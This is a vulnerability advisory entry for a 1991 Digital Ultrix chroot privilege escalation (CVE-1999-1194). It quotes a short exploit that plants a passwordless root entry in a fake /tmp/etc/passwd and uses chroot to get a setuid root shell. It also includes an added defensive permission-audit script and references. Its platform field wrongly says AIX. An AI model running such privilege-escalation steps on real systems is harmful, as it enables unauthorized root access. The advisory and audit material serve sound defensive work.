Digital Ultrix chroot Privilege Escalation Vulnerability

Vulnerability ID: 1105236
Vulnerability type: Unknown
Published: 1991-05-01
Updated: 2005-05-02
CVE ID: CVE-1999-1194
CNNVD-ID: CNNVD-199105-001
Platform: AIX
CVSS score: 7.2
|Vulnerability Source
https://www.exploit-db.com/exploits/19041
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199105-001
|Vulnerability Details
In Digital Ultrix versions 4.1 and 4.0, chroot is insecurely installed, allowing local users to elevate privileges.
|Exploit
source: http://www.securityfocus.com/bid/17/info

By default, /usr/bin/chroot is improperly installed in Ultrix versions 4.0 and 4.1. Anyone can execute /usr/bin/chroot; this can allow system users to gain unauthorized privileges.

$ mkdir /tmp/etc
$ echo root::0:0::/:/bin/sh > /tmp/etc/passwd
$ mkdir /tmp/bin
$ cp /bin/sh /tmp/bin/sh
$ cp /bin/chmod /tmp/bin/chmod
$ chroot /tmp /bin/login

Then log in as root with no password. chmod /tmp/bin/sh to 4700, exit and run the suid /tmp/bin/sh.
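
A defender-side permission check for the condition described above, added here as an example (it is not part of the original advisory or of the exploit-db entry). It assumes "improperly installed" means the binary carries the setuid bit while being executable by users other than its owner; the function name, the verdict words and the temporary files in the self-test are constructed for illustration.

```shell
#!/bin/sh
# Added example: audit chroot-style binaries for the permission pattern that
# lets an unprivileged user run them with the owner's privileges.
# Assumption (not stated on the page): the flaw is setuid + non-owner execute.

# check_chroot_perms FILE -> prints exactly one verdict word:
#   RISKY   setuid bit set and executable by group or other
#   REVIEW  setuid bit set, execute limited to the owner
#   OK      no setuid bit
#   MISSING not a regular file
check_chroot_perms() {
    f=$1
    if [ ! -f "$f" ]; then
        echo MISSING
        return 0
    fi
    # POSIX find: "-perm -MODE" matches when every bit in MODE is set.
    if [ -n "$(find "$f" -prune -perm -4000 \
            \( -perm -0010 -o -perm -0001 \) -print)" ]; then
        echo RISKY
    elif [ -n "$(find "$f" -prune -perm -4000 -print)" ]; then
        echo REVIEW
    else
        echo OK
    fi
}

# Self-test on constructed files (no system binaries are modified).
selftest() {
    d=$(mktemp -d) || return 1
    : > "$d/suid_world"; chmod 4755 "$d/suid_world"
    : > "$d/suid_owner"; chmod 4700 "$d/suid_owner"
    : > "$d/plain";      chmod 0755 "$d/plain"
    for t in suid_world suid_owner plain absent; do
        printf '%-12s %s\n' "$t" "$(check_chroot_perms "$d/$t")"
    done
    rm -rf "$d"
}

# Usage: sh audit.sh /usr/bin/chroot [more paths...]; "--selftest" runs the demo.
if [ "${1:-}" = "--selftest" ]; then
    selftest
elif [ $# -gt 0 ]; then
    for p in "$@"; do
        printf '%s: %s\n' "$p" "$(check_chroot_perms "$p")"
    done
fi
```

A RISKY verdict on a root-owned chroot binary is the state to correct by removing execute access for non-root users or clearing the setuid bit.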
|References

Source: CERT/CC Advisory: CA-1991-05
Name: CA-1991-05
Link: http://www.cert.org/advisories/CA-1991-05.html
Source: XF
Name: dec-chroot(577)
Link: http://xforce.iss.net/static/577.php
Source: BID
Name: 17
Link: http://www.securityfocus.com/bid/17